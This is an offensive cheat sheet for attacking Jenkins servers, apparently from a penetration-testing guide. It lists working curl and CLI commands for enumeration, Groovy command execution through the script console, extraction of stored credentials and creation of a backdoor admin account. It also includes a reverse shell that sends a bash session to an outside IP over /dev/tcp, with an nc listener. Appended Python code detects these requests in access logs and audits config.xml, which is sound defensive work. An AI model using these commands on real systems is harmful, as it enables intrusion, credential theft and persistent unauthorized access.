10. Attacking Jenkins

1. Jenkins Version Detection

  • HTTP Headers:

    curl -I http://target:8080/
  • Nmap Version Detection:

    nmap -sV -p 8080 <target_ip>
  • Jenkins CLI Detection:

    curl http://target:8080/jenkins/cli/ | grep -i "Jenkins CLI"

2. Jenkins Port Enumeration

  • Default HTTP: 8080

  • Slave Communication: 5000

    nmap -sV -p 8080,5000 <target_ip>

3. Jenkins CLI Enumeration

  • Help:

    java -jar jenkins-cli.jar -s http://target:8080/jenkins/ help
  • List Plugins:

    java -jar jenkins-cli.jar -s http://target:8080/jenkins/ list-plugins
  • List Jobs:

    java -jar jenkins-cli.jar -s http://target:8080/jenkins/ list-jobs
    • Enumerate jobs, plugins, users.


4. Jenkins Plugin Enumeration

  • List Installed Plugins:

    curl http://target:8080/jenkins/pluginManager/
    • Common vulnerability source.

    • Vulnerability Search: Inspect plugin names, search for CVEs on NVD/Exploit-DB.

    • Example: Pipeline: Groovy plugin (CVE-2019-10352) allows arbitrary code execution.

    • Exploitation Methods: Research specific plugin CVEs and exploitation methods.


5. Jenkins Security Realm Enumeration

  • Check Authentication Methods:

    curl http://target:8080/jenkins/configureSecurity/
    • Jenkins DB, LDAP, etc.


6. Jenkins API Enumeration

  • API Endpoints:

    curl http://target:8080/jenkins/api/
    curl http://target:8080/jenkins/api/json
  • API Token Enumeration:

    • Check for exposed tokens in API responses or configuration files.

    • Use API tokens for unauthorized access.

    • Enumerate API endpoints for sensitive data using tools like curl or Python's requests library.

  • API Endpoint Vulnerabilities:

    • Test API endpoints for vulnerabilities (fuzzing, parameter manipulation).

    • Check for endpoints allowing command injection or file read.


7. Jenkins Access Control Enumeration

  • Access Control Settings:

    curl http://target:8080/jenkins/configureSecurity/

8. Exploiting Jenkins Script Console

  • Remote Command Execution:

    curl -X POST -u admin:password --data-urlencode "script=println('Exploit successful')" http://target:8080/jenkins/scriptText
  • Groovy Command Execution (Linux):

    curl -X POST -d "script=println 'id'.execute()" http://target:8080/jenkins/scriptText
  • Groovy Command Execution (Windows):

    curl -X POST -d "script=def cmd = 'cmd.exe /c dir'.execute(); println cmd.text" http://target:8080/jenkins/scriptText
  • Reverse Shell via Groovy (Linux):

    curl -X POST -d "script=r = Runtime.getRuntime(); p = r.exec(['/bin/bash','-c','exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do $line 2>&5 >&5; done'] as String[]); p.waitFor()" http://target:8080/jenkins/scriptText
    nc -lvnp 8443

9. Exploiting Build Job Misconfigurations

  • Create Malicious Job:

    java -jar jenkins-cli.jar -s http://target:8080/jenkins/ create-job exploit_job < exploit.xml

10. Exploiting Pipeline Misconfigurations

  • Inject Malicious Groovy Script:

    java -jar jenkins-cli.jar -s http://target:8080/jenkins/ build exploit_pipeline

11. Extracting Credentials from Jenkins

  • Extract Stored Credentials:

    curl -u admin:password http://target:8080/jenkins/credentials/store/system/domain/_/

12. Persistence and Post-Exploitation

  • Create Backdoor User:

    curl -X POST -u admin:password --data-urlencode "script=jenkins.model.Jenkins.instance.securityRealm.createAccount('attacker', 'password')" http://target:8080/jenkins/scriptText
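Defender-side counterpart to sections 8, 11 and 12: every curl one-liner above hits one of a few sensitive endpoints, so a Jenkins access log can be scanned for them. This is an added example, not from the original page; the log lines are constructed in NCSA combined format (what Winstone's access logger writes), and the endpoint patterns are assumptions based on the paths named in this cheat sheet.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines in NCSA combined format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2024:12:00:01 +0000] "GET /jenkins/api/json HTTP/1.1" 200 5120 "-" "curl/8.4.0"
203.0.113.7 - - [10/Jan/2024:12:00:04 +0000] "POST /jenkins/scriptText HTTP/1.1" 200 31 "-" "curl/8.4.0"
203.0.113.7 - - [10/Jan/2024:12:00:09 +0000] "GET /jenkins/credentials/store/system/domain/_/ HTTP/1.1" 200 8044 "-" "curl/8.4.0"
198.51.100.2 - - [10/Jan/2024:12:01:00 +0000] "GET /jenkins/job/build-app/lastBuild/consoleText HTTP/1.1" 200 12000 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Jan/2024:12:01:30 +0000] "POST /jenkins/scriptText HTTP/1.1" 403 0 "-" "python-requests/2.31"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# (method or "*", path regex, label): sensitive endpoints from this page; regexes are assumptions.
RULES = [
    ("POST", re.compile(r"/script(Text)?/?$"), "script console (Groovy execution)"),
    ("GET", re.compile(r"/credentials/store/"), "credentials store browsing"),
    ("*", re.compile(r"/cli(/|$)"), "Jenkins CLI endpoint"),
]

def classify(req):
    """Return the label of the first rule matching a parsed request, or None."""
    for method, path_re, label in RULES:
        if method in ("*", req["method"]) and path_re.search(req["path"]):
            return label
    return None

def scan(log_text):
    """Group sensitive-endpoint hits per client IP; a 2xx status means the action succeeded."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        req = m.groupdict()
        label = classify(req)
        if label:
            outcome = "succeeded" if req["status"].startswith("2") else "denied"
            hits[req["ip"]].append((req["ts"], label, outcome))
    return dict(hits)

if __name__ == "__main__":
    for ip, events in scan(SAMPLE_LOG).items():
        for ts, label, outcome in events:
            print(f"{ip} {ts} {label}: {outcome}")
```

A successful POST to /scriptText from a host that has never authenticated interactively is the single highest-value alert here; a denied one still shows someone probing.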

13. Unauthenticated Exploits (Public Jenkins)

  • Check for Anonymous Access:

    curl http://target:8080/jenkins/

14. Pipeline Script Injection (Groovy RCE)

    def cmd = "whoami".execute()
    println cmd.text

15. Jenkins Slave Exploitation

  • Misconfigured Slave Nodes:

    • Check for misconfigured slave (agent) nodes: insecure communication protocols, lack of access control.

    • Exploit misconfigured slaves to gain access to the Jenkins master.


16. Exploiting Misconfigured Webhooks

  • Webhook-Triggered Jobs:

    • Identify webhook-triggered jobs.


17. Jenkins SSRF & External Service Interaction

    def url = "http://internal-service.local:8080"
    def conn = url.toURL().openConnection()
    println conn.getInputStream().text

18. Jenkins Reverse Shell via Build Step Manipulation

  • Modify Job Build Steps:

    • Modify job build steps for reverse shell.


19. Privilege Escalation via Misconfigured Agents

  • Elevated Privileges:

    • If Jenkins agents run with elevated privileges, execute commands as a higher-privileged user.


20. Arbitrary File Read via Plugin Vulnerabilities

  • Vulnerable Plugins:

    • Exploit vulnerable plugins like "Pipeline: Groovy" to read sensitive files.


Additional Exploitation Techniques

  • 21. CSRF Protection Bypass:

    • Jenkins has CSRF protection, but misconfigurations may allow bypassing.

    • Common bypass methods: Referer header manipulation, token manipulation.

  • 22. Authentication Bypass Details:

    • Expand on authentication bypass vulnerabilities and exploits.

    • Check for anonymous access misconfigurations.

    • Path traversal, header manipulation, session hijacking, default credentials.

  • 23. Jenkins Security Hardening:

    • Keep Jenkins and plugins updated.

    • Restrict access to the script console.

    • Use strong authentication and RBAC.

    • Strong passwords, MFA, network segmentation, regular security audits, principle of least privilege.
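Several weaknesses this page enumerates (security realm, anonymous access, self-signup, CSRF protection, agent port) are visible in $JENKINS_HOME/config.xml, so the checklist in section 23 can be turned into an audit. This is an added example, not from the original page; the sample config is constructed, and the element names checked are the ones Jenkins writes for these settings.

```python
import xml.etree.ElementTree as ET

# Constructed sample of a weakly configured $JENKINS_HOME/config.xml (not a real file).
WEAK_CONFIG = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
    <denyAnonymousReadAccess>false</denyAnonymousReadAccess>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>false</disableSignup>
    <enableCaptcha>false</enableCaptcha>
  </securityRealm>
  <slaveAgentPort>0</slaveAgentPort>
</hudson>
"""

UNSAFE_STRATEGIES = {
    "hudson.security.AuthorizationStrategy$Unsecured",  # "anyone can do anything"
    "hudson.security.LegacyAuthorizationStrategy",      # pre-matrix admin/other model
}

def audit_config(xml_text):
    """Return findings for settings the hardening checklist above would flag."""
    root = ET.fromstring(xml_text)
    findings = []
    if root.findtext("useSecurity", "false").strip() != "true":
        findings.append("useSecurity is off: no authentication at all")
    strat = root.find("authorizationStrategy")
    strat_class = strat.get("class", "") if strat is not None else ""
    if strat_class in UNSAFE_STRATEGIES:
        findings.append(f"authorization strategy {strat_class} grants everyone full control")
    elif strat_class.endswith("FullControlOnceLoggedInAuthorizationStrategy") and \
            strat.findtext("denyAnonymousReadAccess", "false").strip() != "true":
        findings.append("anonymous read access is allowed: jobs, builds and API readable unauthenticated")
    realm = root.find("securityRealm")
    if realm is not None and realm.get("class", "").endswith("HudsonPrivateSecurityRealm"):
        if realm.findtext("disableSignup", "false").strip() != "true":
            findings.append("self-signup enabled: anyone can create an account")
    if root.find("crumbIssuer") is None:
        findings.append("no crumbIssuer: CSRF protection disabled")
    if root.findtext("slaveAgentPort", "-1").strip() == "0":
        findings.append("inbound agent port is random: firewalling the agent protocol is impractical")
    return findings

if __name__ == "__main__":
    for finding in audit_config(WEAK_CONFIG):
        print("FINDING:", finding)
```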
